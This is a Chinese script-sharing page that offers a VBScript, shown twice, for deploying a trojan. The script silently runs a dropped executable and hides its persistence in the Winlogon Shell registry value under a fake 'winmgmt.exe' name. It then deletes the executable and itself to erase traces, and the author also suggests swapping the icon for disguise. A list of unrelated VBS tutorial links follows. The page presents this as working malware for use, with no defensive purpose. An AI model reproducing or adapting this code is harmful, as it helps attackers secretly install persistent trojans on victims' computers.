vbs 注册表实现木马自启动
更新时间:2009年05月13日 17:06:34 作者:
自己捣鼓了半天,终于写出了个脚本,实现flux在注册表中的启动,当然是更隐蔽的方法,别人知道了这个地方也就没戏了。
呵呵~不过别人一般没这个闲工夫检查那么多位置的!就连我也做不到~~
dim wsh
set wsh=CreateObject("WScript.Shell")
wsh.run "%windir%\flumasko.exe",0 //运行木马程序
set sm=Wscript.CreateObject("WScript.Shell")
sm.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","Explorer.exe %systemroot%\system32\winmgmt.exe"
//写进注册表项实现自启动
set WshShell=WScript.CreateObject("WScript.Shell")
WScript.Sleep 2000
//等木马的执行完毕
Set fso=CreateObject("Scripting.FileSystemObject")
f=fso.DeleteFile ("flumasko.exe")
f=fso.DeleteFile (WScript.ScriptName)
//毁尸灭迹
再修改下图标就大功告成了!
复制代码 代码如下:
dim wsh
set wsh=CreateObject("WScript.Shell")
wsh.run "%windir%\flumasko.exe",0 //运行木马程序
set sm=Wscript.CreateObject("WScript.Shell")
sm.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","Explorer.exe %systemroot%\system32\winmgmt.exe"
//写进注册表项实现自启动
set WshShell=WScript.CreateObject("WScript.Shell")
WScript.Sleep 2000
//等木马的执行完毕
Set fso=CreateObject("Scripting.FileSystemObject")
f=fso.DeleteFile ("flumasko.exe")
f=fso.DeleteFile (WScript.ScriptName)
//毁尸灭迹
相关文章
VBS教程:VBscript语句-Option Explicit 语句
VBS教程:VBscript语句-Option Explicit 语句...2006-11-11
verycd,eMule电驴官方网站上说:为了不违背共享精神,是不会为eMule电驴添加自动关机功能的,这要多费电呀,在网上看了一个方法,感觉非常不错,改掉了原代码的不足之处2008-07-07
VBS教程:方法-Read 方法...2006-11-11
这篇文章专为想通过脚本修改ip地址的朋友准备的,第一个bat是测试通过的也比较实用,vbs一般也是通过netsh命令实现,当然也可以不通过netsh实现,具体的大家自行参考下吧2006-09-09
ByVal 传送参数内存的一个拷贝给被调用者。也就是说,栈中压入的直接就是所传的值。 ByRef 传送参数内存的实际地址给被调用者。也就是说,栈中压入的是实际内容的地址。被调用者可以直接更改该地址中的内容。2008-09-09
vbscript本身没有include这样包含其他vbs文件的支持,在asp或html页面里可以用<script ...这样来包含一个vbs文件,如果是直接运行的vbs脚本,就只有用其他办法来代替这个功能了。2009-02-02
用vbscript实现的向指定的文件写字符串,第三个参数指定是否删除原来的内容,喜欢的朋友可以测试系2013-01-01
下面是一些vbs下常用到的一些文件操作代码,整理了下方便以后开发使用,提高效率。2009-08-08
VBS教程:VBScript 基础-VBScript编码约定
VBS教程:VBScript 基础-VBScript编码约定...2006-11-11
今天用脚本实现几个文本文件的合并,被FSO中的几个函数绊住了好久,最终认定这里应该是Window里的Bug。2009-04-04
最新评论